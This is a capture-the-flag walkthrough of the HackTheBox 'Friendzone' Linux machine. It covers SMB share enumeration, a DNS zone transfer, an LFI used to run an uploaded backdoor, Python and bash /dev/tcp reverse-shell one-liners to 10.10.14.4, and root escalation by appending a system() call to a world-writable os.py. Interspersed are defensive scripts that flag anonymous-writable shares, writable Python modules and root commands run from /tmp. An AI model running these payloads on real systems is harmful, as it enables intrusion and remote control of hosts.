| Machine Name | Level | OS | Logo |
|---|---|---|---|
| Friendzone - HTB | Medium | Linux | |
Walkthrough
nmap scan:
Unfortunately I forgot to note it down... But as far as I remember, SMB, 443 and 53 were open.
A note to myself: after seeing SMB, an nmap script scan should also be run.
```
┌──(root💀kali)-[/home/…/Desktop/HTB/Linux/FriendZOne]
└─# nmap --script smb-enum-shares.nse -p445 10.10.10.123
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-31 15:00 EDT
Nmap scan report for friendzone.red (10.10.10.123)
Host is up (0.071s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\10.10.10.123\Development:
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\etc\Development
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\Files:
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files /etc/Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\hole
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.10.123\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (FriendZone server (Samba, Ubuntu))
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\general:
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\general
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\print$:
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>
Nmap done: 1 IP address (1 host up) scanned in 18.13 seconds
```
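The share listing above is what makes this box exploitable: two disk shares (`Development` and `general`) are writable by an unauthenticated guest. Reviewing that by eye works for one host; across a scan of many hosts it is easier to parse the `smb-enum-shares` output and flag the dangerous entries automatically. The following is an added triage script, not part of the original walkthrough, that parses the nmap script output format shown above and returns the disk-tree shares with anonymous write access. It deliberately skips `IPC$`, which Samba always reports as READ/WRITE but which is a named-pipe endpoint, not a file tree. The sample input is a constructed copy of the scan output above.

```python
import re

# A share header line in smb-enum-shares output looks like "\\10.10.10.123\Development:".
SHARE_RE = re.compile(r"^\\\\(?P<host>[^\\]+)\\(?P<name>[^:]+):$")
# Attribute lines look like "Anonymous access: READ/WRITE".
ATTR_RE = re.compile(r"^(?P<key>[A-Za-z ]+): (?P<value>.*)$")

# Constructed sample: the script section of the nmap scan shown above.
SAMPLE_OUTPUT = r"""
| smb-enum-shares:
|   account_used: guest
|   \\10.10.10.123\Development:
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files
|     Path: C:\etc\Development
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\Files:
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files /etc/Files
|     Path: C:\etc\hole
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.10.123\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (FriendZone server (Samba, Ubuntu))
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\general:
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files
|     Path: C:\etc\general
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\print$:
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Anonymous access: <none>
|_    Current user access: <none>
"""


def parse_smb_enum_shares(text):
    """Parse nmap smb-enum-shares output into {share_name: {attribute: value}}.

    Attribute keys are lower-cased ("type", "path", "anonymous access", ...).
    """
    shares = {}
    current = None
    for raw in text.splitlines():
        # Strip nmap's script-output gutter ("| ", "|_ ") and indentation.
        line = raw.lstrip("|_ ").rstrip()
        m = SHARE_RE.match(line)
        if m:
            current = m.group("name")
            shares[current] = {}
            continue
        m = ATTR_RE.match(line)
        if m and current is not None:
            key = m.group("key").strip().lower()
            shares[current][key] = m.group("value").strip()
    return shares


def anonymous_writable_disk_shares(shares):
    """Return the names of disk-tree shares an unauthenticated user can write to.

    Non-disk shares (IPC$ is STYPE_IPC_HIDDEN) are ignored: Samba reports them
    as READ/WRITE for everyone, but they are not a place to drop files.
    """
    hits = []
    for name, attrs in shares.items():
        if attrs.get("type") != "STYPE_DISKTREE":
            continue
        if "WRITE" in attrs.get("anonymous access", "").upper():
            hits.append(name)
    return sorted(hits)


if __name__ == "__main__":
    parsed = parse_smb_enum_shares(SAMPLE_OUTPUT)
    for share in anonymous_writable_disk_shares(parsed):
        print("anonymous write:", share, "->", parsed[share].get("path", "?"))
```

Run against the sample it reports `Development` and `general`; pointing it at real scan output (`nmap -oN` files, or `-oX` with a small XML reader) turns the same check into a fleet-wide finding. The fix on the server side is the usual one: `guest ok = no` and `writable = no` unless a share genuinely needs anonymous drops.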
Next, let's continue with enum4linux (the share listing below is from smbmap).
```
Starting smbmap scan
---- ----------- -------
print$      NO ACCESS    Printer Drivers
Files       NO ACCESS    FriendZone Samba Server Files /etc/Files
general     READ ONLY    FriendZone Samba Server Files
Development READ, WRITE  FriendZone Samba Server Files
IPC$        NO ACCESS    IPC Service (FriendZone server (Samba, Ubuntu))
```
I found a creds.txt file.
```
┌──(root💀kali)-[/home/…/Desktop/HTB/Linux/FriendZOne]
└─# smbclient -W 'WORKGROUP' //'10.10.10.123'/'general' -U''%''
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jan 16 15:10:51 2019
  ..                                  D        0  Wed Jan 23 16:51:02 2019
  creds.txt                           N       57  Tue Oct  9 19:52:42 2018

		9221460 blocks of size 1024. 6410736 blocks available
smb: \> get creds.txt
getting file \creds.txt of size 57 as creds.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> exit

┌──(root💀kali)-[/home/…/Desktop/HTB/Linux/FriendZOne]
└─# cat creds.txt
creds for the admin THING:
admin:WORKWORKHhallelujah@#
```
Since 53 was open, I tried a DNS zone transfer.
```
┌──(root💀kali)-[~]
└─# host -l "friendzone.red" 10.10.10.123
Using domain server:
Name: 10.10.10.123
Address: 10.10.10.123#53
Aliases:

friendzone.red has IPv6 address ::1
friendzone.red name server localhost.
friendzone.red has address 127.0.0.1
administrator1.friendzone.red has address 127.0.0.1
hr.friendzone.red has address 127.0.0.1
uploads.friendzone.red has address 127.0.0.1
```
I then added these to /etc/hosts and continued. When enumerating over SMB we had already identified the path of the Development share (`/etc/Development`). At the same time, at:
`https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=<LFI>`
I found an LFI. We have write access to the Development path and we have an LFI, so we can get a reverse shell.
```
┌──(root💀kali)-[/home/…/Desktop/HTB/Linux/FriendZOne]
└─# smbclient -W 'WORKGROUP' //'10.10.10.123'/'Development' -U''%''
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Aug 31 16:14:31 2021
  ..                                  D        0  Wed Jan 23 16:51:02 2019

		9221460 blocks of size 1024. 6460340 blocks available
smb: \> put simple-backdoor.php
putting file simple-backdoor.php as \simple-backdoor.php (1.5 kb/s) (average 1.5 kb/s)
smb: \> ls
  .                                   D        0  Tue Aug 31 16:15:29 2021
  ..                                  D        0  Wed Jan 23 16:51:02 2019
  simple-backdoor.php                 A      328  Tue Aug 31 16:15:29 2021

		9221460 blocks of size 1024. 6460336 blocks available
smb: \>
```
When we go to the address
`https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/simple-backdoor`
I got a reverse shell with the payload `python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",1111));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'`.
```
┌──(root💀kali)-[/home/…/Desktop/HTB/Linux/FriendZOne]
└─# nc -lvp 1111
listening on [any] 1111 ...
connect to [10.10.14.4] from friendzone.red [10.10.10.123] 59346
www-data@FriendZone:/var/www/admin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@FriendZone:/var/www/admin$ cd /home
cd /home
www-data@FriendZone:/home$ ls
ls
friend
www-data@FriendZone:/home$ cd friend
cd friend
www-data@FriendZone:/home/friend$ ls
ls
user.txt
www-data@FriendZone:/home/friend$ cat user.txt
cat user.txt
a9ed20acecd6c5b6b52f474e15ae9a11
```
After switching to the friend user (the `su friend` from the www-data shell shows up in the pspy output further down), during the information-gathering phase I saw Python libraries among the files we can write to.
```
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/etc/Development
/etc/Development/simple-backdoor.php
/etc/sambafiles
/home/friend
/run/lock
/run/user/1000
/run/user/1000/gnupg
/run/user/1000/systemd
/tmp
/tmp/.font-unix
/tmp/.ICE-unix
/tmp/linpeas.sh
/tmp/result1
/tmp/.Test-unix
#)You_can_write_even_more_files_inside_last_directory
/usr/lib/python2.7
/usr/lib/python2.7/os.py
/usr/lib/python2.7/os.pyc
/var/lib/php/sessions
/var/mail/friend
/var/spool/samba
/var/tmp
```
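The two lines that matter in that list are `/usr/lib/python2.7` and `/usr/lib/python2.7/os.py`: a standard-library module that any local user can edit, on a host where root runs Python from cron. Anything written into `os.py` executes as root the next time a privileged script imports it. The following is an added hardening check, not part of the original walkthrough, that walks a set of module directories and reports every directory and `.py`/`.pyc`/`.pth` file that the group or world can write. `demo()` builds a constructed temporary tree with a world-writable `os.py`, mirroring the linpeas finding, so the check can be exercised offline; run the script directly and it audits the current interpreter's `sys.path` instead.

```python
import os
import stat
import sys
import tempfile

# Group or world write bit: either one lets an unprivileged user change the file.
GROUP_OR_WORLD_WRITE = stat.S_IWGRP | stat.S_IWOTH
MODULE_SUFFIXES = (".py", ".pyc", ".pth")


def writable_by_others(path):
    """True if the group or world write bit is set on `path` (symlinks not followed)."""
    return bool(os.lstat(path).st_mode & GROUP_OR_WORLD_WRITE)


def audit_module_dirs(dirs):
    """Walk each directory and return a sorted list of module files and
    directories that a non-owner can modify.

    A writable directory is reported too: an attacker does not need to edit
    os.py if they can drop a sitecustomize.py or a .pth file beside it.
    """
    findings = []
    for top in dirs:
        if not os.path.isdir(top):  # sys.path may contain '' or zip files
            continue
        for root, _subdirs, files in os.walk(top):
            if writable_by_others(root):
                findings.append(root)
            for name in files:
                if name.endswith(MODULE_SUFFIXES):
                    path = os.path.join(root, name)
                    if writable_by_others(path):
                        findings.append(path)
    return sorted(findings)


def demo():
    """Constructed fixture: a fake stdlib tree in a temp dir where os.py and
    os.pyc are mode 0666, like the linpeas finding above, and one module is a
    sane 0644. Returns the findings relative to the temp dir."""
    with tempfile.TemporaryDirectory() as tmp:
        lib = os.path.join(tmp, "python2.7")
        os.makedirs(lib)
        os.chmod(lib, 0o755)
        for name, mode in (("os.py", 0o666), ("os.pyc", 0o666), ("sane.py", 0o644)):
            path = os.path.join(lib, name)
            with open(path, "w") as fh:
                fh.write("# constructed placeholder module\n")
            os.chmod(path, mode)
        return [os.path.relpath(p, tmp) for p in audit_module_dirs([lib])]


if __name__ == "__main__":
    for hit in audit_module_dirs(sys.path):
        print("writable by others:", hit)
```

The same idea applies to any interpreter a root job uses (Perl's `@INC`, Ruby's `$LOAD_PATH`): the permissions of the search path are part of the trust boundary of every privileged script, so `chmod o-w` on the library tree and a periodic run of a check like this are the practical mitigations.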
I listened with ./pspy32s to see what was happening.
```
friend@FriendZone:/tmp$ ./pspy32s
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2021/09/01 00:23:43 CMD: UID=0 PID=98 |
2021/09/01 00:23:43 CMD: UID=0 PID=9 |
2021/09/01 00:23:43 CMD: UID=0 PID=89 |
2021/09/01 00:23:43 CMD: UID=107 PID=862 | /usr/sbin/exim4 -bd -q30m
2021/09/01 00:23:43 CMD: UID=0 PID=854 | /usr/sbin/smbd --foreground --no-process-group
2021/09/01 00:23:43 CMD: UID=0 PID=853 | /usr/sbin/smbd --foreground --no-process-group
2021/09/01 00:23:43 CMD: UID=0 PID=852 | /usr/sbin/smbd --foreground --no-process-group
2021/09/01 00:23:43 CMD: UID=0 PID=85 |
2021/09/01 00:23:43 CMD: UID=0 PID=82 |
2021/09/01 00:23:43 CMD: UID=0 PID=81 |
2021/09/01 00:23:43 CMD: UID=0 PID=80 |
2021/09/01 00:23:43 CMD: UID=0 PID=8 |
2021/09/01 00:23:43 CMD: UID=0 PID=79 |
2021/09/01 00:23:43 CMD: UID=0 PID=78 |
2021/09/01 00:23:43 CMD: UID=0 PID=77 |
2021/09/01 00:23:43 CMD: UID=0 PID=711 | /usr/sbin/smbd --foreground --no-process-group
2021/09/01 00:23:43 CMD: UID=0 PID=7 |
2021/09/01 00:23:43 CMD: UID=0 PID=6 |
2021/09/01 00:23:43 CMD: UID=0 PID=577 | /usr/sbin/nmbd --foreground --no-process-group
2021/09/01 00:23:43 CMD: UID=1000 PID=5498 | /usr/bin/gpg-agent --supervised
2021/09/01 00:23:43 CMD: UID=1000 PID=54384 | ./pspy32s
2021/09/01 00:23:43 CMD: UID=0 PID=54344 |
2021/09/01 00:23:43 CMD: UID=0 PID=54301 |
2021/09/01 00:23:43 CMD: UID=0 PID=54230 |
2021/09/01 00:23:43 CMD: UID=33 PID=488 | /usr/sbin/apache2 -k start
2021/09/01 00:23:43 CMD: UID=33 PID=487 | /usr/sbin/apache2 -k start
2021/09/01 00:23:43 CMD: UID=33 PID=486 | /usr/sbin/apache2 -k start
2021/09/01 00:23:43 CMD: UID=33 PID=485 | /usr/sbin/apache2 -k start
2021/09/01 00:23:43 CMD: UID=33 PID=484 | /usr/sbin/apache2 -k start
2021/09/01 00:23:43 CMD: UID=0 PID=482 | /usr/sbin/apache2 -k start
2021/09/01 00:23:43 CMD: UID=0 PID=478 | /sbin/agetty -o -p -- \u --noclear tty1 linux
2021/09/01 00:23:43 CMD: UID=0 PID=469 | /usr/sbin/vsftpd /etc/vsftpd.conf
2021/09/01 00:23:43 CMD: UID=0 PID=465 | /usr/sbin/sshd -D
2021/09/01 00:23:43 CMD: UID=109 PID=458 | /usr/sbin/named -f -4 -u bind
2021/09/01 00:23:43 CMD: UID=0 PID=4 |
2021/09/01 00:23:43 CMD: UID=0 PID=397 | /usr/bin/VGAuthService
2021/09/01 00:23:43 CMD: UID=103 PID=391 | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
2021/09/01 00:23:43 CMD: UID=102 PID=390 | /usr/sbin/rsyslogd -n
2021/09/01 00:23:43 CMD: UID=0 PID=389 | /lib/systemd/systemd-logind
2021/09/01 00:23:43 CMD: UID=0 PID=383 | /usr/sbin/cron -f
2021/09/01 00:23:43 CMD: UID=0 PID=381 | /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
2021/09/01 00:23:43 CMD: UID=0 PID=380 | /usr/lib/accountsservice/accounts-daemon
2021/09/01 00:23:43 CMD: UID=0 PID=35 |
2021/09/01 00:23:43 CMD: UID=62583 PID=346 | /lib/systemd/systemd-timesyncd
2021/09/01 00:23:43 CMD: UID=101 PID=345 | /lib/systemd/systemd-resolved
2021/09/01 00:23:43 CMD: UID=0 PID=34 |
2021/09/01 00:23:43 CMD: UID=0 PID=32 |
2021/09/01 00:23:43 CMD: UID=0 PID=30 |
2021/09/01 00:23:43 CMD: UID=0 PID=29 |
2021/09/01 00:23:43 CMD: UID=0 PID=28 |
2021/09/01 00:23:43 CMD: UID=0 PID=27 |
2021/09/01 00:23:43 CMD: UID=0 PID=26 |
2021/09/01 00:23:43 CMD: UID=100 PID=254 | /lib/systemd/systemd-networkd
2021/09/01 00:23:43 CMD: UID=0 PID=253 | /lib/systemd/systemd-udevd
2021/09/01 00:23:43 CMD: UID=0 PID=25 |
2021/09/01 00:23:43 CMD: UID=0 PID=24 |
2021/09/01 00:23:43 CMD: UID=0 PID=23 |
2021/09/01 00:23:43 CMD: UID=0 PID=228 | /usr/bin/vmtoolsd
2021/09/01 00:23:43 CMD: UID=0 PID=227 | /lib/systemd/systemd-journald
2021/09/01 00:23:43 CMD: UID=0 PID=22 |
2021/09/01 00:23:43 CMD: UID=0 PID=21 |
2021/09/01 00:23:43 CMD: UID=0 PID=20 |
2021/09/01 00:23:43 CMD: UID=0 PID=2 |
2021/09/01 00:23:43 CMD: UID=0 PID=196 |
2021/09/01 00:23:43 CMD: UID=0 PID=195 |
2021/09/01 00:23:43 CMD: UID=0 PID=19 |
2021/09/01 00:23:43 CMD: UID=0 PID=18 |
2021/09/01 00:23:43 CMD: UID=0 PID=174 |
2021/09/01 00:23:43 CMD: UID=0 PID=173 |
2021/09/01 00:23:43 CMD: UID=0 PID=172 |
2021/09/01 00:23:43 CMD: UID=0 PID=170 |
2021/09/01 00:23:43 CMD: UID=0 PID=17 |
2021/09/01 00:23:43 CMD: UID=0 PID=169 |
2021/09/01 00:23:43 CMD: UID=0 PID=168 |
2021/09/01 00:23:43 CMD: UID=0 PID=16 |
2021/09/01 00:23:43 CMD: UID=0 PID=15 |
2021/09/01 00:23:43 CMD: UID=0 PID=14 |
2021/09/01 00:23:43 CMD: UID=33 PID=1321 | /usr/sbin/apache2 -k start
2021/09/01 00:23:43 CMD: UID=1000 PID=1301 | -bash
2021/09/01 00:23:43 CMD: UID=0 PID=13 |
2021/09/01 00:23:43 CMD: UID=1000 PID=1299 | sshd: friend@pts/1
2021/09/01 00:23:43 CMD: UID=0 PID=1273 | sshd: friend [priv]
2021/09/01 00:23:43 CMD: UID=1000 PID=1258 | bash
2021/09/01 00:23:43 CMD: UID=1000 PID=1248 | (sd-pam)
2021/09/01 00:23:43 CMD: UID=1000 PID=1247 | /lib/systemd/systemd --user
2021/09/01 00:23:43 CMD: UID=33 PID=1246 | su friend
2021/09/01 00:23:43 CMD: UID=33 PID=1223 | /bin/bash
2021/09/01 00:23:43 CMD: UID=33 PID=1222 | python -c import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",1111));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")
2021/09/01 00:23:43 CMD: UID=33 PID=1221 | sh -c python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",1111));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'
2021/09/01 00:23:43 CMD: UID=33 PID=1206 | /usr/sbin/apache2 -k start
2021/09/01 00:23:43 CMD: UID=0 PID=12 |
2021/09/01 00:23:43 CMD: UID=0 PID=1195 | /usr/sbin/smbd --foreground --no-process-group
2021/09/01 00:23:43 CMD: UID=0 PID=115 |
2021/09/01 00:23:43 CMD: UID=0 PID=11 |
2021/09/01 00:23:43 CMD: UID=0 PID=10 |
2021/09/01 00:23:43 CMD: UID=0 PID=1 | /sbin/init splash
2021/09/01 00:24:01 CMD: UID=0 PID=54394 | /usr/bin/python /opt/server_admin/reporter.py
2021/09/01 00:24:01 CMD: UID=0 PID=54393 | /bin/sh -c /opt/server_admin/reporter.py
2021/09/01 00:24:01 CMD: UID=0 PID=54392 | /usr/sbin/CRON -f
2021/09/01 00:24:01 CMD: UID=0 PID=54396 | bash /tmp/shell.sh
2021/09/01 00:24:01 CMD: UID=0 PID=54395 | sh -c bash /tmp/shell.sh
2021/09/01 00:24:01 CMD: UID=0 PID=54397 | bash /tmp/shell.sh
2021/09/01 00:24:01 CMD: UID=0 PID=54402 | /bin/sh /usr/bin/lesspipe
2021/09/01 00:24:01 CMD: UID=0 PID=54401 | /bin/sh /usr/bin/lesspipe
2021/09/01 00:24:01 CMD: UID=0 PID=54400 | bash -i
2021/09/01 00:24:01 CMD: UID=0 PID=54406 | dircolors -b
2021/09/01 00:24:01 CMD: UID=0 PID=54405 | bash -i
2021/09/01 00:24:01 CMD: UID=0 PID=54394 | /usr/bin/python /opt/server_admin/reporter.py
```
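The interesting part of that capture is the 00:24:01 burst: `CRON` (UID 0) runs `/usr/bin/python /opt/server_admin/reporter.py`, and within the same second root also runs `bash /tmp/shell.sh`. A root process executing a script from a world-writable staging directory is a strong signal on any host, not just this one. The following is an added detection example, not part of the original walkthrough, that parses pspy's `CMD:` line format and flags every UID 0 command whose argv references `/tmp`, `/var/tmp` or `/dev/shm`. The sample is a constructed excerpt of the capture above; the same rule applies unchanged to auditd `EXECVE` records or any process-creation log that gives you the UID and the command line.

```python
import re

# pspy prints: "<date> <time> CMD: UID=<uid> PID=<pid> | <command line>"
PSPY_RE = re.compile(
    r"^(?P<ts>\S+ \S+) CMD: UID=(?P<uid>\d+)\s+PID=(?P<pid>\d+)\s+\|\s?(?P<cmd>.*)$"
)

# Directories where any local user can create files; root should not execute from them.
STAGING_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Constructed sample: a trimmed copy of the 00:24:01 burst from the capture above.
SAMPLE_PSPY = """\
2021/09/01 00:24:01 CMD: UID=0 PID=54394 | /usr/bin/python /opt/server_admin/reporter.py
2021/09/01 00:24:01 CMD: UID=0 PID=54393 | /bin/sh -c /opt/server_admin/reporter.py
2021/09/01 00:24:01 CMD: UID=0 PID=54392 | /usr/sbin/CRON -f
2021/09/01 00:24:01 CMD: UID=0 PID=54396 | bash /tmp/shell.sh
2021/09/01 00:24:01 CMD: UID=0 PID=54395 | sh -c bash /tmp/shell.sh
2021/09/01 00:24:01 CMD: UID=1000 PID=54384 | ./pspy32s
2021/09/01 00:24:01 CMD: UID=1000 PID=54410 | cat /tmp/result1
2021/09/01 00:24:01 CMD: UID=0 PID=54400 | bash -i
"""


def parse_pspy(text):
    """Parse pspy output into a list of {ts, uid, pid, cmd} dicts.

    Lines that are not CMD events (the banner, 'done', blank lines) are skipped.
    """
    events = []
    for line in text.splitlines():
        m = PSPY_RE.match(line)
        if not m:
            continue
        events.append({
            "ts": m.group("ts"),
            "uid": int(m.group("uid")),
            "pid": int(m.group("pid")),
            "cmd": m.group("cmd").strip(),
        })
    return events


def root_commands_from_staging_dirs(events):
    """Return (pid, cmd) for every UID 0 command that names a path under a
    world-writable staging directory. The UID 1000 'cat /tmp/result1' is not
    reported: an unprivileged user touching /tmp is normal, root doing so is not."""
    return [
        (e["pid"], e["cmd"])
        for e in events
        if e["uid"] == 0 and any(d in e["cmd"] for d in STAGING_DIRS)
    ]


if __name__ == "__main__":
    for pid, cmd in root_commands_from_staging_dirs(parse_pspy(SAMPLE_PSPY)):
        print(f"root executed from staging dir: pid={pid} cmd={cmd!r}")
```

On the sample this reports PIDs 54396 and 54395 (`bash /tmp/shell.sh` and its `sh -c` parent). In production you would not run pspy; the equivalent telemetry is `auditctl -a always,exit -F arch=b64 -S execve -F euid=0` with the same path match applied to the `EXECVE` argv, which catches this class of cron-to-root pivot without needing to know which library file was tampered with.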
Now let's manipulate this file.
```
friend@FriendZone:/tmp$ cat shell.sh
bash -i >& /dev/tcp/10.10.14.4/1234 0>&1
friend@FriendZone:/tmp$ tail /usr/lib/python2.7/os.py
    try:
        _copy_reg.pickle(statvfs_result, _pickle_statvfs_result,
                         _make_statvfs_result)
    except NameError: # statvfs_result may not exist
        pass
system("bash /tmp/shell.sh")
```
```
┌──(root💀kali)-[/opt]
└─# nc -lvp 1234
listening on [any] 1234 ...
connect to [10.10.14.4] from friendzone.red [10.10.10.123] 49692
bash: cannot set terminal process group (54393): Inappropriate ioctl for device
bash: no job control in this shell
root@FriendZone:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@FriendZone:~# cd /root
cd /root
root@FriendZone:~# ls
ls
certs
root.txt
root@FriendZone:~# cat root.txt
cat root.txt
b0e6c60b82cf96e9855ac1656a9e90c7
root@FriendZone:~#
```